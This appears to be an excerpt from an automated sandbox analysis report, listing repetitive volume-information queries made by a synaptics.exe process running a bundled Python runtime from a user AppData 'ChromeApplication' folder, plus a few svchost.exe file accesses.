Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\_distutils_hack\__init__.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\_distutils_hack\__init__.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\_distutils_hack\__init__.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\_distutils_hack\__init__.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\_distutils_hack VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\_distutils_hack\__pycache__\__init__.cpython-310.pyc.9654096 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pywin32.pth VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\DLLs VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\__pycache__\pywin32_bootstrap.cpython-310.pyc.10774944 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\DLLs VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pywin32_system32 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pywin32_system32 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\DLLs VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32 VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\__init__.py VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\__init__.py VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\__pycache__\__init__.cpython-310.pyc VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\__pycache__\__init__.cpython-310.pyc VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\codecs.py VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\codecs.py VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\codecs.cpython-310.pyc VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\codecs.cpython-310.pyc VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\aliases.py VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\aliases.py VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\__pycache__\aliases.cpython-310.pyc VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\__pycache__\aliases.cpython-310.pyc VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\utf_8.py VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\utf_8.py VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\__pycache__\utf_8.cpython-310.pyc VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\__pycache__\utf_8.cpython-310.pyc VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp1252.py VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\cp1252.py VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\__pycache__\cp1252.cpython-310.pyc VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\encodings\__pycache__\cp1252.cpython-310.pyc VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\io.py VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\io.py VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\io.cpython-310.pyc VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\io.cpython-310.pyc VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\abc.py VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\abc.py VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\abc.cpython-310.pyc VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\abc.cpython-310.pyc VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site.py VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site.py VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\site.cpython-310.pyc VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\site.cpython-310.pyc VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\os.py VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\os.py VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\os.cpython-310.pyc VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\os.cpython-310.pyc VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\stat.py VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\stat.py VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\stat.cpython-310.pyc VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\stat.cpython-310.pyc VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\_collections_abc.py VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\_collections_abc.py VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\_collections_abc.cpython-310.pyc VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\_collections_abc.cpython-310.pyc VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\ntpath.py VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\ntpath.py VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\ntpath.cpython-310.pyc VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\ntpath.cpython-310.pyc VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\genericpath.py VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\genericpath.py VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\genericpath.cpython-310.pyc VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\genericpath.cpython-310.pyc VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\_sitebuiltins.py VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\_sitebuiltins.py VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\_sitebuiltins.cpython-310.pyc VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\__pycache__\_sitebuiltins.cpython-310.pyc VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\distutils-precedence.pth VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\_distutils_hack\__init__.py VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\_distutils_hack\__init__.py VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\_distutils_hack\__pycache__\__init__.cpython-310.pyc VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\_distutils_hack\__pycache__\__init__.cpython-310.pyc VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pywin32.pth VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32 VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32 VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32 VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32 VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\pywin32_bootstrap.py VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\__pycache__\pywin32_bootstrap.cpython-310.pyc VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\lib\__pycache__\pywin32_bootstrap.cpython-310.pyc VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pywin32_system32 VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32 VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pythonwin VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\pywin32_system32 VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeQueries volume information: C:\Users\user\AppData\Local\ChromeApplication VolumeInformation
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: 7_2_005415EB GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,7_2_005415EB
Source: C:\Users\user\AppData\Local\ChromeApplication\synaptics.exeCode function: 7_2_6C571BF0 Py_GetVersion,PyOS_snprintf,PyOS_snprintf,7_2_6C571BF0
